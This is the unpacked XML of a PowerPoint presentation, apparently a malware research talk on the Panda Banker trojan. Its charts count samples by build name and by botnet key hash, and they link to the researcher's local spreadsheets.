
<file path=[Content_Types].xml><?xml version="1.0" encoding="utf-8"?>
<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">
  <Default Extension="png" ContentType="image/png"/>
  <Default Extension="svg" ContentType="image/svg+xml"/>
  <Default Extension="xlsm" ContentType="application/vnd.ms-excel.sheet.macroEnabled.12"/>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9.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0.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSl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1.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2.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3.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSl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4.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5.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58.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlid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67.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlid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68.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/charts/chart27.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28.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76.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+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0.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275" r:id="rId2"/>
    <p:sldId id="279" r:id="rId3"/>
    <p:sldId id="281" r:id="rId4"/>
    <p:sldId id="282" r:id="rId5"/>
    <p:sldId id="283" r:id="rId6"/>
    <p:sldId id="284" r:id="rId7"/>
    <p:sldId id="285" r:id="rId8"/>
    <p:sldId id="286" r:id="rId9"/>
    <p:sldId id="287" r:id="rId10"/>
    <p:sldId id="288" r:id="rId11"/>
    <p:sldId id="291" r:id="rId12"/>
    <p:sldId id="292" r:id="rId13"/>
    <p:sldId id="290" r:id="rId14"/>
    <p:sldId id="265" r:id="rId15"/>
    <p:sldId id="267"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7" r:id="rId29"/>
    <p:sldId id="308" r:id="rId30"/>
    <p:sldId id="314" r:id="rId31"/>
    <p:sldId id="309" r:id="rId32"/>
    <p:sldId id="311" r:id="rId33"/>
    <p:sldId id="315" r:id="rId34"/>
    <p:sldId id="312" r:id="rId35"/>
    <p:sldId id="313" r:id="rId36"/>
    <p:sldId id="317" r:id="rId37"/>
    <p:sldId id="318" r:id="rId38"/>
    <p:sldId id="325" r:id="rId39"/>
    <p:sldId id="372" r:id="rId40"/>
    <p:sldId id="392" r:id="rId41"/>
    <p:sldId id="393" r:id="rId42"/>
    <p:sldId id="394" r:id="rId43"/>
    <p:sldId id="395" r:id="rId44"/>
    <p:sldId id="319" r:id="rId45"/>
    <p:sldId id="321" r:id="rId46"/>
    <p:sldId id="322" r:id="rId47"/>
    <p:sldId id="326" r:id="rId48"/>
    <p:sldId id="327" r:id="rId49"/>
    <p:sldId id="328" r:id="rId50"/>
    <p:sldId id="333" r:id="rId51"/>
    <p:sldId id="329" r:id="rId52"/>
    <p:sldId id="330" r:id="rId53"/>
    <p:sldId id="332" r:id="rId54"/>
    <p:sldId id="334" r:id="rId55"/>
    <p:sldId id="335" r:id="rId56"/>
    <p:sldId id="336" r:id="rId57"/>
    <p:sldId id="337" r:id="rId58"/>
    <p:sldId id="338" r:id="rId59"/>
    <p:sldId id="339" r:id="rId60"/>
    <p:sldId id="341" r:id="rId61"/>
    <p:sldId id="342" r:id="rId62"/>
    <p:sldId id="343" r:id="rId63"/>
    <p:sldId id="344" r:id="rId64"/>
    <p:sldId id="345" r:id="rId65"/>
    <p:sldId id="353" r:id="rId66"/>
    <p:sldId id="346" r:id="rId67"/>
    <p:sldId id="347" r:id="rId68"/>
    <p:sldId id="348" r:id="rId69"/>
    <p:sldId id="350" r:id="rId70"/>
    <p:sldId id="351" r:id="rId71"/>
    <p:sldId id="352" r:id="rId72"/>
    <p:sldId id="354" r:id="rId73"/>
    <p:sldId id="367" r:id="rId74"/>
    <p:sldId id="356" r:id="rId75"/>
    <p:sldId id="357" r:id="rId76"/>
    <p:sldId id="359" r:id="rId77"/>
    <p:sldId id="360" r:id="rId78"/>
    <p:sldId id="373" r:id="rId79"/>
    <p:sldId id="374" r:id="rId80"/>
    <p:sldId id="375" r:id="rId81"/>
    <p:sldId id="376" r:id="rId82"/>
    <p:sldId id="377" r:id="rId83"/>
    <p:sldId id="378" r:id="rId84"/>
    <p:sldId id="384" r:id="rId85"/>
    <p:sldId id="380" r:id="rId86"/>
    <p:sldId id="381" r:id="rId87"/>
    <p:sldId id="383" r:id="rId88"/>
    <p:sldId id="385" r:id="rId89"/>
    <p:sldId id="386" r:id="rId90"/>
    <p:sldId id="387" r:id="rId91"/>
    <p:sldId id="391" r:id="rId92"/>
    <p:sldId id="400" r:id="rId93"/>
    <p:sldId id="397" r:id="rId94"/>
    <p:sldId id="398" r:id="rId95"/>
    <p:sldId id="389" r:id="rId96"/>
    <p:sldId id="390" r:id="rId97"/>
    <p:sldId id="370" r:id="rId98"/>
    <p:sldId id="368" r:id="rId99"/>
    <p:sldId id="37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1788F"/>
    <a:srgbClr val="65656A"/>
    <a:srgbClr val="F37735"/>
    <a:srgbClr val="63B0E8"/>
    <a:srgbClr val="8E211E"/>
    <a:srgbClr val="C4C6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0" autoAdjust="0"/>
    <p:restoredTop sz="73236"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToObjects="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="104" d="100"/>
          <a:sy n="104" d="100"/>
        </p:scale>
        <p:origin x="1200" y="19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xlsm"/></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Macro-Enabled_Worksheet8.xlsm"/><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Macro-Enabled_Worksheet9.xlsm"/><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Macro-Enabled_Worksheet10.xlsm"/><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Macro-Enabled_Worksheet11.xlsm"/><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oleObject" Target="file:////Users/dschwarz/Projects/Malware/everything_panda_banker/static_botnets.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Macro-Enabled_Worksheet12.xlsm"/><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Macro-Enabled_Worksheet13.xlsm"/><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oleObject" Target="file:////Users/dschwarz/Projects/Malware/everything_panda_banker/baseconfig_keys.xlsx" TargetMode="External"/><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Macro-Enabled_Worksheet14.xlsm"/><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oleObject" Target="file:////Users/dschwarz/Projects/Malware/everything_panda_banker/baseconfig_keys.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Macro-Enabled_Worksheet15.xlsm"/><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Macro-Enabled_Worksheet16.xlsm"/><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Macro-Enabled_Worksheet17.xlsm"/><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Macro-Enabled_Worksheet18.xlsm"/><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oleObject" Target="file:////Users/dschwarz/Projects/Malware/everything_panda_banker/webinject_tlds.xlsx" TargetMode="External"/><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oleObject" Target="file:////Users/dschwarz/Projects/Malware/everything_panda_banker/webinject_tlds.xlsx" TargetMode="External"/><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oleObject" Target="file:////Users/dschwarz/Projects/Malware/everything_panda_banker/webinject_types.xlsx" TargetMode="External"/><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3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="file:////Users/dschwarz/Projects/Malware/everything_panda_banker/webinject_tlds.xlsx" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.microsoft.com/office/2011/relationships/chartColorStyle" Target="colors25.xml"/><Relationship Id="rId1" Type="http://schemas.microsoft.com/office/2011/relationships/chartStyle" Target="style25.xml"/></Relationships>
</file>

<file path=ppt/charts/_rels/chart28.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="file:////Users/dschwarz/Projects/Malware/everything_panda_banker/group_samples.xlsx" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.microsoft.com/office/2011/relationships/chartColorStyle" Target="colors26.xml"/><Relationship Id="rId1" Type="http://schemas.microsoft.com/office/2011/relationships/chartStyle" Target="style26.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Macro-Enabled_Worksheet19.xlsm"/><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oleObject" Target="file:////Users/dschwarz/Projects/Malware/everything_panda_banker/version_activity.xlsx" TargetMode="External"/><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3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="file:////Users/dschwarz/Projects/Malware/everything_panda_banker/baseconfig_keys.xlsx" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.microsoft.com/office/2011/relationships/chartColorStyle" Target="colors28.xml"/><Relationship Id="rId1" Type="http://schemas.microsoft.com/office/2011/relationships/chartStyle" Target="style28.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Macro-Enabled_Worksheet2.xlsm"/><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Macro-Enabled_Worksheet3.xlsm"/><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Macro-Enabled_Worksheet4.xlsm"/><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Macro-Enabled_Worksheet5.xlsm"/><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Macro-Enabled_Worksheet6.xlsm"/><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Macro-Enabled_Worksheet7.xlsm"/><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rgbClr val="517891"/>
            </a:solidFill>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51E2-9D4C-99D8-1ED24C8FE7DA}"/>
            </c:ext>
          </c:extLst>
        </c:ser>
        <c:ser>
          <c:idx val="1"/>
          <c:order val="1"/>
          <c:tx>
            <c:strRef>
              <c:f>Sheet1!$C$1</c:f>
              <c:strCache>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>Series 2</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:srgbClr val="63B0E8"/>
            </a:solidFill>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51E2-9D4C-99D8-1ED24C8FE7DA}"/>
            </c:ext>
          </c:extLst>
        </c:ser>
        <c:dLbls>
          <c:showLegendKey val="0"/>
          <c:showVal val="0"/>
          <c:showCatName val="0"/>
          <c:showSerName val="0"/>
          <c:showPercent val="0"/>
          <c:showBubbleSize val="0"/>
        </c:dLbls>
        <c:gapWidth val="150"/>
        <c:axId val="-2050185608"/>
        <c:axId val="-2050181096"/>
      </c:barChart>
      <c:catAx>
        <c:axId val="-2050185608"/>
        <c:scaling>
          <c:orientation val="minMax"/>
        </c:scaling>
        <c:delete val="0"/>
        <c:axPos val="b"/>
        <c:numFmt formatCode="General" sourceLinked="1"/>
        <c:majorTickMark val="out"/>
        <c:minorTickMark val="none"/>
        <c:tickLblPos val="nextTo"/>
        <c:txPr>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr sz="1001" b="1">
                <a:solidFill>
                  <a:srgbClr val="65656A"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:pPr>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </c:txPr>
        <c:crossAx val="-2050181096"/>
        <c:crosses val="autoZero"/>
        <c:auto val="1"/>
        <c:lblAlgn val="ctr"/>
        <c:lblOffset val="100"/>
        <c:noMultiLvlLbl val="0"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="-2050181096"/>
        <c:scaling>
          <c:orientation val="minMax"/>
        </c:scaling>
        <c:delete val="0"/>
        <c:axPos val="l"/>
        <c:majorGridlines/>
        <c:numFmt formatCode="General" sourceLinked="1"/>
        <c:majorTickMark val="out"/>
        <c:minorTickMark val="none"/>
        <c:tickLblPos val="nextTo"/>
        <c:txPr>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr sz="819">
                <a:solidFill>
                  <a:srgbClr val="65656A"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:pPr>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </c:txPr>
        <c:crossAx val="-2050185608"/>
        <c:crosses val="autoZero"/>
        <c:crossBetween val="between"/>
      </c:valAx>
      <c:spPr>
        <a:noFill/>
        <a:ln w="23108">
          <a:noFill/>
        </a:ln>
      </c:spPr>
    </c:plotArea>
    <c:legend>
      <c:legendPos val="r"/>
      <c:overlay val="0"/>
      <c:txPr>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr>
            <a:defRPr sz="1001">
              <a:solidFill>
                <a:srgbClr val="65656A"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
            </a:defRPr>
          </a:pPr>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </c:txPr>
    </c:legend>
    <c:plotVisOnly val="1"/>
    <c:dispBlanksAs val="gap"/>
    <c:showDLblsOverMax val="0"/>
  </c:chart>
  <c:txPr>
    <a:bodyPr/>
    <a:lstStyle/>
    <a:p>
      <a:pPr>
        <a:defRPr sz="1638" b="0" i="0" u="none" strike="noStrike" baseline="0">
          <a:solidFill>
            <a:srgbClr val="000000"/>
          </a:solidFill>
          <a:latin typeface="Times New Roman"/>
          <a:ea typeface="Times New Roman"/>
          <a:cs typeface="Times New Roman"/>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9355477199965404E-2"/>
          <c:y val="5.9233556626317241E-2"/>
          <c:w val="0.92457498626625156"/>
          <c:h val="0.67723815183479419"/>
        </c:manualLayout>
      </c:layout>
      <c:barChart>
        <c:barDir val="col"/>
        <c:grouping val="clustered"/>
        <c:varyColors val="0"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:spPr>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
            <a:ln>
              <a:noFill/>
            </a:ln>
            <a:effectLst/>
          </c:spPr>
          <c:invertIfNegative val="0"/>
          <c:cat>
            <c:strRef>
              <c:f>Sheet1!$B$1:$B$50</c:f>
              <c:strCache>
                <c:ptCount val="50"/>
                <c:pt idx="0">
                  <c:v>2.2.12-CA</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>armata</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>2.5.7</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>2.6.9</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>2.6.1</c:v>
                </c:pt>
                <c:pt idx="5">
                  <c:v>lucky</c:v>
                </c:pt>
                <c:pt idx="6">
                  <c:v>2.6.8</c:v>
                </c:pt>
                <c:pt idx="7">
                  <c:v>2.6.10</c:v>
                </c:pt>
                <c:pt idx="8">
                  <c:v>onore2</c:v>
                </c:pt>
                <c:pt idx="9">
                  <c:v>onore</c:v>
                </c:pt>
                <c:pt idx="10">
                  <c:v>2.5.5</c:v>
                </c:pt>
                <c:pt idx="11">
                  <c:v>botnet-static</c:v>
                </c:pt>
                <c:pt idx="12">
                  <c:v>2.6.5</c:v>
                </c:pt>
                <c:pt idx="13">
                  <c:v>MOF</c:v>
                </c:pt>
                <c:pt idx="14">
                  <c:v>2.5.7_sas</c:v>
                </c:pt>
                <c:pt idx="15">
                  <c:v>2.6.6</c:v>
                </c:pt>
                <c:pt idx="16">
                  <c:v>MOF4</c:v>
                </c:pt>
                <c:pt idx="17">
                  <c:v>markit</c:v>
                </c:pt>
                <c:pt idx="18">
                  <c:v>2.6.4</c:v>
                </c:pt>
                <c:pt idx="19">
                  <c:v>2.5.0.</c:v>
                </c:pt>
                <c:pt idx="20">
                  <c:v>bla</c:v>
                </c:pt>
                <c:pt idx="21">
                  <c:v>18072017</c:v>
                </c:pt>
                <c:pt idx="22">
                  <c:v>NewBuild</c:v>
                </c:pt>
                <c:pt idx="23">
                  <c:v>NOP</c:v>
                </c:pt>
                <c:pt idx="24">
                  <c:v>billit</c:v>
                </c:pt>
                <c:pt idx="25">
                  <c:v>armata2</c:v>
                </c:pt>
                <c:pt idx="26">
                  <c:v>MOF1</c:v>
                </c:pt>
                <c:pt idx="27">
                  <c:v>NewBuild4</c:v>
                </c:pt>
                <c:pt idx="28">
                  <c:v>dor</c:v>
                </c:pt>
                <c:pt idx="29">
                  <c:v>SPAM</c:v>
                </c:pt>
                <c:pt idx="30">
                  <c:v>3.4.1</c:v>
                </c:pt>
                <c:pt idx="31">
                  <c:v>sssdk</c:v>
                </c:pt>
                <c:pt idx="32">
                  <c:v>2.6.2</c:v>
                </c:pt>
                <c:pt idx="33">
                  <c:v>5.2.9_2</c:v>
                </c:pt>
                <c:pt idx="34">
                  <c:v>2.2.5</c:v>
                </c:pt>
                <c:pt idx="35">
                  <c:v>over2</c:v>
                </c:pt>
                <c:pt idx="36">
                  <c:v>ank</c:v>
                </c:pt>
                <c:pt idx="37">
                  <c:v>2.6.10_e</c:v>
                </c:pt>
                <c:pt idx="38">
                  <c:v>2.4.2</c:v>
                </c:pt>
                <c:pt idx="39">
                  <c:v>NewBuild3</c:v>
                </c:pt>
                <c:pt idx="40">
                  <c:v>MOF3</c:v>
                </c:pt>
                <c:pt idx="41">
                  <c:v>2.5.6</c:v>
                </c:pt>
                <c:pt idx="42">
                  <c:v>2.5.1</c:v>
                </c:pt>
                <c:pt idx="43">
                  <c:v>Pips</c:v>
                </c:pt>
                <c:pt idx="44">
                  <c:v>2.6.3</c:v>
                </c:pt>
                <c:pt idx="45">
                  <c:v>2.2.14</c:v>
                </c:pt>
                <c:pt idx="46">
                  <c:v>over3</c:v>
                </c:pt>
                <c:pt idx="47">
                  <c:v>ARA</c:v>
                </c:pt>
                <c:pt idx="48">
                  <c:v>2.5.7_1</c:v>
                </c:pt>
                <c:pt idx="49">
                  <c:v>fer</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>Sheet1!$C$1:$C$50</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="50"/>
                <c:pt idx="0">
                  <c:v>1101</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>169</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>129</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>90</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>74</c:v>
                </c:pt>
                <c:pt idx="5">
                  <c:v>62</c:v>
                </c:pt>
                <c:pt idx="6">
                  <c:v>60</c:v>
                </c:pt>
                <c:pt idx="7">
                  <c:v>60</c:v>
                </c:pt>
                <c:pt idx="8">
                  <c:v>59</c:v>
                </c:pt>
                <c:pt idx="9">
                  <c:v>59</c:v>
                </c:pt>
                <c:pt idx="10">
                  <c:v>54</c:v>
                </c:pt>
                <c:pt idx="11">
                  <c:v>49</c:v>
                </c:pt>
                <c:pt idx="12">
                  <c:v>45</c:v>
                </c:pt>
                <c:pt idx="13">
                  <c:v>41</c:v>
                </c:pt>
                <c:pt idx="14">
                  <c:v>34</c:v>
                </c:pt>
                <c:pt idx="15">
                  <c:v>32</c:v>
                </c:pt>
                <c:pt idx="16">
                  <c:v>26</c:v>
                </c:pt>
                <c:pt idx="17">
                  <c:v>24</c:v>
                </c:pt>
                <c:pt idx="18">
                  <c:v>23</c:v>
                </c:pt>
                <c:pt idx="19">
                  <c:v>22</c:v>
                </c:pt>
                <c:pt idx="20">
                  <c:v>21</c:v>
                </c:pt>
                <c:pt idx="21">
                  <c:v>21</c:v>
                </c:pt>
                <c:pt idx="22">
                  <c:v>20</c:v>
                </c:pt>
                <c:pt idx="23">
                  <c:v>20</c:v>
                </c:pt>
                <c:pt idx="24">
                  <c:v>19</c:v>
                </c:pt>
                <c:pt idx="25">
                  <c:v>18</c:v>
                </c:pt>
                <c:pt idx="26">
                  <c:v>18</c:v>
                </c:pt>
                <c:pt idx="27">
                  <c:v>17</c:v>
                </c:pt>
                <c:pt idx="28">
                  <c:v>16</c:v>
                </c:pt>
                <c:pt idx="29">
                  <c:v>15</c:v>
                </c:pt>
                <c:pt idx="30">
                  <c:v>14</c:v>
                </c:pt>
                <c:pt idx="31">
                  <c:v>13</c:v>
                </c:pt>
                <c:pt idx="32">
                  <c:v>13</c:v>
                </c:pt>
                <c:pt idx="33">
                  <c:v>12</c:v>
                </c:pt>
                <c:pt idx="34">
                  <c:v>12</c:v>
                </c:pt>
                <c:pt idx="35">
                  <c:v>11</c:v>
                </c:pt>
                <c:pt idx="36">
                  <c:v>11</c:v>
                </c:pt>
                <c:pt idx="37">
                  <c:v>11</c:v>
                </c:pt>
                <c:pt idx="38">
                  <c:v>11</c:v>
                </c:pt>
                <c:pt idx="39">
                  <c:v>10</c:v>
                </c:pt>
                <c:pt idx="40">
                  <c:v>10</c:v>
                </c:pt>
                <c:pt idx="41">
                  <c:v>10</c:v>
                </c:pt>
                <c:pt idx="42">
                  <c:v>10</c:v>
                </c:pt>
                <c:pt idx="43">
                  <c:v>9</c:v>
                </c:pt>
                <c:pt idx="44">
                  <c:v>9</c:v>
                </c:pt>
                <c:pt idx="45">
                  <c:v>9</c:v>
                </c:pt>
                <c:pt idx="46">
                  <c:v>8</c:v>
                </c:pt>
                <c:pt idx="47">
                  <c:v>8</c:v>
                </c:pt>
                <c:pt idx="48">
                  <c:v>8</c:v>
                </c:pt>
                <c:pt idx="49">
                  <c:v>7</c:v>
                </c:pt>
              </c:numCache>
            </c:numRef>
          </c:val>
          <c:extLst>
            <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
              <c16:uniqueId val="{00000000-26E2-7145-8ABE-7A40161D0101}"/>
            </c:ext>
          </c:extLst>
        </c:ser>
        <c:dLbls>
          <c:showLegendKey val="0"/>
          <c:showVal val="0"/>
          <c:showCatName val="0"/>
          <c:showSerName val="0"/>
          <c:showPercent val="0"/>
          <c:showBubbleSize val="0"/>
        </c:dLbls>
        <c:gapWidth val="219"/>
        <c:overlap val="-27"/>
        <c:axId val="548845248"/>
        <c:axId val="548846928"/>
      </c:barChart>
      <c:catAx>
        <c:axId val="548845248"/>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Static Botnets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48846928"/>
        <c:crosses val="autoZero"/>
        <c:auto val="1"/>
        <c:lblAlgn val="ctr"/>
        <c:lblOffset val="100"/>
        <c:noMultiLvlLbl val="0"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="54884692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Samples (log)</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48845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Samples</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
            <a:ln>
              <a:noFill/>
            </a:ln>
            <a:effectLst/>
          </c:spPr>
          <c:invertIfNegative val="0"/>
          <c:cat>
            <c:strRef>
              <c:f>Sheet1!$A$2:$A$35</c:f>
              <c:strCache>
                <c:ptCount val="34"/>
                <c:pt idx="0">
                  <c:v>f74c5f2d12c616fc31d6ce8d6cc2c4e8 </c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>1d6455fcd8ccb511d0b552fb946cbfc6 </c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>17683c9fad54a66d0f2db1b3b3befef7 </c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>6d37cff905fe9838e592faad174a1d48 </c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>b696ca2c75e53f6c1fd4528e3dff64db </c:v>
                </c:pt>
                <c:pt idx="5">
                  <c:v>5b8178163cd3183a8425681a3aae5dd9 </c:v>
                </c:pt>
                <c:pt idx="6">
                  <c:v>08a55d58235d4cb45af48b19b0ccf623 </c:v>
                </c:pt>
                <c:pt idx="7">
                  <c:v>2cec25f8a419317e59af07b33bca94bf </c:v>
                </c:pt>
                <c:pt idx="8">
                  <c:v>42f986a0921d079fd5f25456bcdec819 </c:v>
                </c:pt>
                <c:pt idx="9">
                  <c:v>92cf7854f7cc343fd4c18fd752eaacd7 </c:v>
                </c:pt>
                <c:pt idx="10">
                  <c:v>36a27bcf5ff2d8297558fa260232e130 </c:v>
                </c:pt>
                <c:pt idx="11">
                  <c:v>e62b0bd79b87f5b25e25bfe3c0b62366 </c:v>
                </c:pt>
                <c:pt idx="12">
                  <c:v>3d4120f73c9768e86439b3d503160915 </c:v>
                </c:pt>
                <c:pt idx="13">
                  <c:v>f8c0de335771422ade3818cde1c92a4f </c:v>
                </c:pt>
                <c:pt idx="14">
                  <c:v>70f95f0b971e1f35110374c887adcabd </c:v>
                </c:pt>
                <c:pt idx="15">
                  <c:v>9499a3a2ad587859f6c67de53f304438 </c:v>
                </c:pt>
                <c:pt idx="16">
                  <c:v>bb848c612ed96dc58015dcee5364cb1d </c:v>
                </c:pt>
                <c:pt idx="17">
                  <c:v>2587f79592e49af779c64533b3778a38 </c:v>
                </c:pt>
                <c:pt idx="18">
                  <c:v>6aee324dc17f003b0a54c7d615412f64 </c:v>
                </c:pt>
                <c:pt idx="19">
                  <c:v>75880767c765e84f682ce2e9bff9b344 </c:v>
                </c:pt>
                <c:pt idx="20">
                  <c:v>4ce7b478a223f8693f8edc0de1316580 </c:v>
                </c:pt>
                <c:pt idx="21">
                  <c:v>7b310d296bb47e57e1c8d67f52d89ca6 </c:v>
                </c:pt>
                <c:pt idx="22">
                  <c:v>6b85ce5458299f27d88fac96210bc2a1 </c:v>
                </c:pt>
                <c:pt idx="23">
                  <c:v>975e6e2bd85026d8475a2a090c4e1269 </c:v>
                </c:pt>
                <c:pt idx="24">
                  <c:v>ee52e367bfa94108a2ad01b4445fe2f3 </c:v>
                </c:pt>
                <c:pt idx="25">
                  <c:v>574aa7769cf8889c5502a944b2b18609 </c:v>
                </c:pt>
                <c:pt idx="26">
                  <c:v>078193c64ba0682b885a133aff9ccdee </c:v>
                </c:pt>
                <c:pt idx="27">
                  <c:v>b2851224e48e98e15a9433109597f8bc </c:v>
                </c:pt>
                <c:pt idx="28">
                  <c:v>89e770d738bf5950bb2205063392f31a </c:v>
                </c:pt>
                <c:pt idx="29">
                  <c:v>d724a5040c7b8492228e9fc1716429ac </c:v>
                </c:pt>
                <c:pt idx="30">
                  <c:v>1b02708b2110c5a14f8f70d0d75b7bd7 </c:v>
                </c:pt>
                <c:pt idx="31">
                  <c:v>2d12493fb6393f970590a918bb4a55d5 </c:v>
                </c:pt>
                <c:pt idx="32">
                  <c:v>b37d3f277ce2182668a02bbc9edffd6b </c:v>
                </c:pt>
                <c:pt idx="33">
                  <c:v>2f99642fc51f1b4951005a50666b1629 </c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>Sheet1!$B$2:$B$35</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="34"/>
                <c:pt idx="0">
                  <c:v>1556</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>600</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>456</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>320</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>160</c:v>
                </c:pt>
                <c:pt idx="5">
                  <c:v>139</c:v>
                </c:pt>
                <c:pt idx="6">
                  <c:v>129</c:v>
                </c:pt>
                <c:pt idx="7">
                  <c:v>123</c:v>
                </c:pt>
                <c:pt idx="8">
                  <c:v>115</c:v>
                </c:pt>
                <c:pt idx="9">
                  <c:v>87</c:v>
                </c:pt>
                <c:pt idx="10">
                  <c:v>81</c:v>
                </c:pt>
                <c:pt idx="11">
                  <c:v>71</c:v>
                </c:pt>
                <c:pt idx="12">
                  <c:v>64</c:v>
                </c:pt>
                <c:pt idx="13">
                  <c:v>56</c:v>
                </c:pt>
                <c:pt idx="14">
                  <c:v>55</c:v>
                </c:pt>
                <c:pt idx="15">
                  <c:v>48</c:v>
                </c:pt>
                <c:pt idx="16">
                  <c:v>46</c:v>
                </c:pt>
                <c:pt idx="17">
                  <c:v>36</c:v>
                </c:pt>
                <c:pt idx="18">
                  <c:v>33</c:v>
                </c:pt>
                <c:pt idx="19">
                  <c:v>32</c:v>
                </c:pt>
                <c:pt idx="20">
                  <c:v>31</c:v>
                </c:pt>
                <c:pt idx="21">
                  <c:v>24</c:v>
                </c:pt>
                <c:pt idx="22">
                  <c:v>23</c:v>
                </c:pt>
                <c:pt idx="23">
                  <c:v>17</c:v>
                </c:pt>
                <c:pt idx="24">
                  <c:v>16</c:v>
                </c:pt>
                <c:pt idx="25">
                  <c:v>15</c:v>
                </c:pt>
                <c:pt idx="26">
                  <c:v>15</c:v>
                </c:pt>
                <c:pt idx="27">
                  <c:v>14</c:v>
                </c:pt>
                <c:pt idx="28">
                  <c:v>12</c:v>
                </c:pt>
                <c:pt idx="29">
                  <c:v>12</c:v>
                </c:pt>
                <c:pt idx="30">
                  <c:v>12</c:v>
                </c:pt>
                <c:pt idx="31">
                  <c:v>9</c:v>
                </c:pt>
                <c:pt idx="32">
                  <c:v>9</c:v>
                </c:pt>
                <c:pt idx="33">
                  <c:v>8</c:v>
                </c:pt>
              </c:numCache>
            </c:numRef>
          </c:val>
          <c:extLst>
            <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
              <c16:uniqueId val="{00000000-E0AD-804B-A439-C406C78FD6BB}"/>
            </c:ext>
          </c:extLst>
        </c:ser>
        <c:dLbls>
          <c:showLegendKey val="0"/>
          <c:showVal val="0"/>
          <c:showCatName val="0"/>
          <c:showSerName val="0"/>
          <c:showPercent val="0"/>
          <c:showBubbleSize val="0"/>
        </c:dLbls>
        <c:gapWidth val="219"/>
        <c:overlap val="-27"/>
        <c:axId val="2011134767"/>
        <c:axId val="2132018687"/>
      </c:barChart>
      <c:catAx>
        <c:axId val="2011134767"/>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Botnet Key Hashes (MD5)</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132018687"/>
        <c:crosses val="autoZero"/>
        <c:auto val="1"/>
        <c:lblAlgn val="ctr"/>
        <c:lblOffset val="100"/>
        <c:noMultiLvlLbl val="0"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="21320186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Samples (log)</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011134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2011134767"/>
        <c:axId val="2132018687"/>
      </c:barChart>
      <c:catAx>
        <c:axId val="20111347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Botnet Key Hashes (MD5)</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2018687"/>
        <c:crosses val="autoZero"/>
        <c:auto val="1"/>
        <c:lblAlgn val="ctr"/>
        <c:lblOffset val="100"/>
        <c:noMultiLvlLbl val="0"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="21320186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Samples (log)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1134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rgbClr val="517891"/>
            </a:solidFill>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4783-9049-8F68-FF350E47DED2}"/>
            </c:ext>
          </c:extLst>
        </c:ser>
        <c:ser>
          <c:idx val="1"/>
          <c:order val="1"/>
          <c:tx>
            <c:strRef>
              <c:f>Sheet1!$C$1</c:f>
              <c:strCache>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>Series 2</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:srgbClr val="63B0E8"/>
            </a:solidFill>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4783-9049-8F68-FF350E47DED2}"/>
            </c:ext>
